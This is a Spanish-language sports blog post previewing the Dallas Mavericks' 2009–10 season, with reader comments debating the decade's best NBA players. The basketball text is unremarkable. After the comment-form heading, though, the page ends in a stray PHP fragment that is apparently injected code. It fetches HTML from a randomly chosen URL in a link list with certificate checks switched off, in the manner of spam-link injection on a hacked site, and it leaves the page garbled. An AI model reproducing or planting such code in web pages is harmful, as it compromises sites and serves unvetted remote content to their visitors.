Dallas Mavericks: Quemando las naves

15 de October de 2009 por TheDeerHunter

Ya hace tiempo que dejó de existir un mañana en Dallas. Concretamente, la fecha de caducidad del proyecto más ambicioso de Marc Cuban se determinó el día que largaron a Devin Harris, el más prometedor activo de la franquicia. Ese mismo día llegó un Jason Kidd demasiado veterano como para hacerles salir de la barrena perdedora en la que habían entrado tras la pérdida del anillo. Aquel fue el punto de no retorno hacia una dolorosa reconstrucción que se aproxima inexorablemente. A partir de aquel momento todo ha girado en torno a aprovechar de la mejor manera posible las últimas flechas de Robin Hood concentrándose exclusivamente en el aquí y el ahora, incorporando desesperadamente jugadores con cierto nombre, pero con muy escaso recorrido.

La idea no es del todo descabellada teniendo en cuenta el callejón sin salida en el que ya se habían visto atrapados. En estos momentos ya tienen poco que perder. Ahora no queda otra que emular al tahúr Maverick de la película de Mel Gibson y apostarlo todo en una última jugada casi suicida. Cuando este momento pase, ni todo el dinero del mundo servirá para esquivar varios años de penurias deportivas. Es ley de vida.

El ahora dice que este equipo fue concebido para alcanzar el anillo. Durante varios años ese ha sido el objetivo y no valía ningún otro. Algo queda de todo eso en la plantilla actual, sin mencionar a Dirk Nowitzki, del que alguno aún asegura que todavía sería capaz de ganar con 4 compañeros mancos. Somos conscientes de que es mucho más probable que algunos caigan en el ocaso definitivo de sus carreras a que nos sorprendan con un rendimiento acorde al mejor de sus momentos. Pero, ¿es descabellado pensar que todavía puedan rendir a buen nivel? y en ese caso ¿cuál sería el potencial de este equipo? El año pasado, con peores mimbres, todavía dieron guerra en las semifinales de conferencia.

La posición de base está correctamente cubierta. Jason Kidd ya no es el mejor base de la liga ni de lejos, no es el tipo que llevaba a los Nets a las finales con la gorra y se le ve sufrir frente a los bases más jóvenes y rápidos. Sin embargo, algunas de sus virtudes permanecen intactas. Criterio, jerarquía y experiencia para cumplir con solvencia en la dirección de cualquier equipo. Por su parte el puertorriqueño José Juan Barea es, a sus 25 años, un jugador que viene progresando temporada tras temporada y que afronta su curso de doctorado. Pensamos que lo puede hacer bien. De Rodrigue Beaubois se habla muy bien pero este año ya se puede dar con un canto en los dientes de disfrutar de Kidd como tutor. Muchos minutos de juego no podrá rascar.

Jason Terry es una buena solución como escolta. El combo-guard fue el mejor 6º hombre de la pasada campaña y no cambiará su rol si las cosas marchan con normalidad. Aquí surge la duda sobre quién sería nominalmente el “titular” aun siendo un detalle un tanto anecdótico. Matt Carroll o Quinton Ross pueden cumplir perfectamente en ese limitado rol. Se especula también con la posibilidad de que Josh Howard podría abrir de 2 y pasar después al 3 con Terry. Tampoco les quitará ni de pobres ni de ricos, donde realmente puede rendir es como alero. Si no es mucho pedir que juegue centrado es un muy buen complemento, sin ninguna duda.

La gran novedad será Shawn Marion, jugador altamente bajo sospecha. Contrato de 5 años que muy probablemente retirará a “The Matrix” en el equipo tejano si es que, como ponen en duda las malas lenguas, el jugador está realmente en activo. Y es que hubo un tiempo en el que se le consideraba uno de los mejores aleros de la liga. Da la impresión que Kidd y Carlisle pueden ser el contexto ideal para que recupere cierto crédito. Si no se duerme les dará interesantes alternativas tácticas. A partir de ahí se cuenta muy poco (o nada) con Shawne Williams.

Por dentro, no lo olvidemos, todavía cuentan con la gran esperanza blanca, el faro que todo lo puede. Nowitzki ha pasado un verano terrible en lo personal que no le habrá permitido pensar demasiado en el baloncesto. Él hubiera preferido aparecer en las noticias deportivas en lugar de las de sucesos y seguro que le apetecerá pasar página como sólo un campeón como él sabe: ametrallando el aro. El alemán sigue siendo un pura sangre y si los demás son capaces de arroparle es perfectamente capaz de llevarlos a lo máximo.

La pérdida de Brandon Bass la minimizará Drew Gooden. Tras su partido (literal) con Sacramento y el flojo paso por San Antonio, buscará recuperar el gran nivel que mostró en Chicago, jugando muchos minutos incluso de center, con la falta que haría que alguien diera muuuucho descanso a nuestro gran icono del “Cazo Powa” Eric Dampier, cuya última hazaña fue coger dos rebotes en 40 minutos durante el último partido oficial que disputaron. La rotación por dentro puede completarse correctamente con Tim Thomas, Singleton y Kris Humphries. Nathan Jawai y Jake Voskuhl tendrán muchos minutos… para reflexionar en el banquillo.

Rick Carlisle dispone este año de un buen equipo. Compensado, con calidad, experiencia y muy de su gusto. A priori nadie apostaría por ellos como favoritos al anillo, pero se trata seguramente de una de las 4 o 5 mejores plantillas del oeste y puede dar guerra de la buena en los momentos más decisivos. Ya lo viemos el año pasado con un equipo bastante peor armado. Podrán haber excusas por no ser campeones (aunque realmente ese fuera el único objetivo que les importe) pero nunca por no hacer una temporada digna.

Quinteto inicial: Kidd, Howard, Marion, Nowitzki, Gooden
Sexto Hombre:
Terry.

Pronóstico: Semifinales de Conferencia.

Comenta

16 comentarios a esta entrada

  1. Kantonyo dice:
    #1

    Contestando a Sergio en el articulo de los Spurs…

    No, para nada me parece una mejora considerable disponer de Marion y Gooden, según demostraron el año pasado. No creo que sean jugadores que den un plus a equipos que están tan arriba, a no ser que recuperen su mejor nivel de hace dos o tres años…

    Y mas teniendo en cuenta que lo comparamos con Denver, el cual el año pasado le metio una soberana paliza en los playoffs…

      Citar

  2. sergio dice:
    #2

    Hombre… si vuelven a sus numeros de antes Gooden seria un 13-9 (hacer un 10-4 en 20 minutos en SAS no me parece ser un paquete como apuntais)y Marion un 15-10…. pero supongo que los habran fichado para crear equipo sustituyendo a Dampier, que perdio la garra cuando le hicieron el contrato desde los Warriors, y para sumar centimetros en el puesto de alero, cosa que hacia falta teniendo a Terry de escolta. Ademas, Marion y Gooden siempre han cumplido esas labores. La duda que me crean viene mas bien de la aportacion de Kidd, que ya cualquier base de la ultima hornada lo baila… Esperemos que la experiencia sea un grado. Yo los veo como tu, por debajo de Denver, pero me parece que por jugadores tienen mas nivel de mejora que los Nuggets. En cualquier caso creo que ambos deberian ser los semifinalistas de Conferencia, y a partir de ahi a soñar!

    Y por supuesto Carlisle es mucho mas entrenador que A.Johnson

      Citar

  3. pcerezo dice:
    #3

    Esos cuatro partidos perdidos seguidos en las finales del 2006 son una losa para todos. Una final practicámente ganada y de un plumazo pérdida.
    Qué pasó? nunca se sabrá…la conjunción de los astros quiso que Wade casi se disfrazara de Dios y ganará él solo una final, que de repente no entrara nada y que el sueño se acabara de la manera más dolorosa posible.
    Dar mando en plaza a un casi entrenador, Mr. Bonobus creo que es el mayor timo de los últimos años, fue uno de los grandes errores, además del pastizal firmado a Dampier mientras Nash repartía juego en los Suns.
    Desde entonces todo está sujeto a lo que pueda hacer Nowitzki y es curioso pero las decisiones que toman en Dallas me recuerdan a las del Milán, fichaje de jugadores veteranos pasados de todo y casi sin recorrido.

    Veremos como sale, pero tengo la impresión que tal y como se apunta en el artículo, semifinales de conferencia debe ser el objetivo.

    El drama es que y la temporada que viene?….

    Un saludo,
    Pablo

      Citar

  4. M dice:
    #4

    Creo que están un escalon por debajo de los favoritos de su conferencia y su decadencia se irá multiplicando cada año, pero espero que lleguen bien a playoffs y que tengan una despedida memorable en ellos, dando alguna sorpresa o vendiendo cara su piel, apoyándose en su saber hacer y su experiencia, dándolo todo… . Como dijo Eneas en Troya para dar valor a sus compañeros, “La única salvación para los vencidos es no esperar salvación alguna”. Pues eso, se deben y nos deben todavía momentos memorables en una temporada en la que es de suponer, abundarán los tropiezos. Ánimo, chavales 🙂

      Citar

  5. Viva_Dirk dice:
    #5

    No he oido a nadie decir que Nowitzki pueda ganar con 4 compañeros mancos. Desde luego es uno de los 4 o 5 mejores jugadores de esta década que toca a su fin.

      Citar

  6. Txusma dice:
    #6

    Sin orden:

    Kobe, Garnett, Nash, Duncan, Lebron… Dirk?

      Citar

  7. L.Casei dice:
    #7

    Este Dallas va a ser un equipo muy fuerte y ambicioso, no creo que estén tan de vuelta como dice PCerezo. Está por ver, pero creo que sí van a luchar hasta el final. Creo que Dampier seguirá siendo titular, aunque sea de adorno, y que Marion rendirá bien por sus características en el estilo del equipo.
    Por cierto, Sergio: si criticas a McMillan por su corte inmovilista o autoritario, llama la atención que alabes tanto a Rick Carlisle. Con sus matices, son entrenadores bastante similares en ese sentido, no?
    Y en cuanto a Avery Johnson, pensaba que se había tomado un añito sabático (tuvo ofertas durante la temporada), pero parece que se ha quedado sin sitio, al menos por ahora. A mí si me parece buen entrenador : valiente, directo y agresivo, como lo era de jugador.

      Citar

  8. Viva_Dirk dice:
    #8

    Ves, yo no metería a Lebron en ese grupo para esta década básicamente porque no ha jugado 3 temporadas. Y a Nash, pese a sus 2 MVP´s tampoco, no llegó a la final cuando pudo y en sus años de Dallas su rendimiento no fue tan alto. Década que acaba este mismo año, y que desde luego pondria a Lebron donde tu dices si gana la conferencia Este.

    Yo diria: Duncan-Shaq-Kobe-Garnett-Nowitzki.

    Duncan, Kobe y Shaq con 3 anillos cada uno, Garnett uno, y de los que quedan, Nowitzki es el 2º máximo anotador de ese tiempo por detrás de Kobe, 5º reboteador, 4º en partidos jugados y 2º en minutos jugados, con muy buenos porcentajes siempre. Y siempre ha mantenido a Dallas en una muy buena posición. Además de ser un tipo de jugador único en la historia de la NBA.

      Citar

  9. Kiki dice:
    #9

    Caramba con el teutón…. no es malo, no.

      Citar

  10. Viva_Dirk dice:
    #10

    Para Casei: A mi Avery Johnson me parece un buen entrenador para la regular season y un mal entrenador para los play-offs. Es el primer entrenador que yo recuerde que después de ir ganando 2-0 una final de la NBA saliese haciendo declaraciones de que no le gustaba ver a Nowitzki y Terry teniendo tanto el balón y lanzando tanto a canasta, que queria ver a todos los jugadores involucrados. Hizo eso y cascaron los 4 siguientes, mientras Riley ponía al equipo al servicio de Wade.

      Citar

  11. CAMPO2 dice:
    #11

    yo para mis 5 mejores de la decada serian:

    Shaq, Duncan, Kobe, Garnett y Jason Kidd

    Tener mas de cien triples dobles no es moco de pavo qu el unico que le arebatara ese record parece ser que sera Lebron

      Citar

  12. sergio dice:
    #12

    @ L.Casei: Pues hombre… Carlisle en su primer año tenia a 10 jugadores por encima de 16 minutos por partido y … creo que confiaba en toda su plantilla. Y en cuanto a soluciones ofensivas… Hamilton, Billups, C.Robinson y Williamson seguro que se jugaron canastas… no jugar para nadie… era jugar como equipo y luego los Clutch para quien sea. Y en Indiana pues mas de lo mismo… J.O’neal, R.Miller, Harrington, Artest, Tinsley… y 9 jugadores por encima de 18 mpp. McMillan 8.. y por encima de 14. Y los entrenadores saben a quien cubrir en los finales apretados… a Roy. Supongo que sera una cuestion de gustos tambien, y por supuesto que no tiene nada que ver con mi tocayo Sergio Rodriguez… no estaba hecho para ese equipo….

    Los mejores de la decada? Duncan, Shaq, Kobe parecen claros… luego hay bastantes para no olvidar: Garnett, Nash, Kidd, Wade (si, Wade), Billups, Parker, Iverson!!, Lebron,…. hasta el “looser” de McGrady o Carter (promedio de 23 puntos en su carrera…)

      Citar

  13. CAMPO2 dice:
    #13

    lo de iverson con su cuerpecillo tiene su tema lo que a logrado

      Citar

  14. Viva_Dirk dice:
    #14

    Si el tema va de cuerpecillos, deberiamos sacar de esa lista a Shaq, que no ha ganado cada liga que ha jugado.

    Ninguno de esos que nombrais ha sido tan regular como Nowitzki, Billups si ha sido muy regular, pero en un nivel inferior al alemán. Wade igual que Lebron necesitaría mas años, o hacer algo grande con Miami este mismo.

    Campo habla de los 102 triples dobles de Kidd como si fuese el lider, tanto Magic como Robertson le quedan muy lejos. Pero vaya, para mi es el que mas se acerca a ese grupo, aun sin haber ganado un título y aunque le robaran un MVP.

      Citar

  15. Txusma dice:
    #15

    Wade ya ha hecho algo grande esta década…. Pero vaya que tampoco es para discutir.

      Citar

  16. Tobal dice:
    #16

    Dallas creo que está ante una de sus últimas posibilidades de hacer algo,pienso que tienen un buen equipo
    con experiencia y calidad,con un poco de suerte pueden llegar a semifinales de conferencia.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>